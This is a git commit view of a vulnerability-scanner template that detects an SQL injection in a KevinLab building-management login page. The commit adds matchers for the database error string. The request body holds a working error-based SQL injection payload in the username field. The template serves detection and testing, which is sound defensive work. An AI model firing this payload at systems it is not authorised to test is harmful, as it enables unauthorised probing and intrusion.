Update kevinlab-bems-sqli.yaml

patch-1
Prince Chaddha 2021-07-24 11:59:35 +05:30 committed by GitHub
parent 87b4c2e98b
commit 9a46592f71
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 0 deletions

View File

@ -25,7 +25,12 @@ requests:
requester=login&request=login&params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
matchers-condition: and
matchers:
- type: word
words:
- "XPATH syntax error"
- ": '\\ZSL1ZSL'"
- type: status
status:
- 200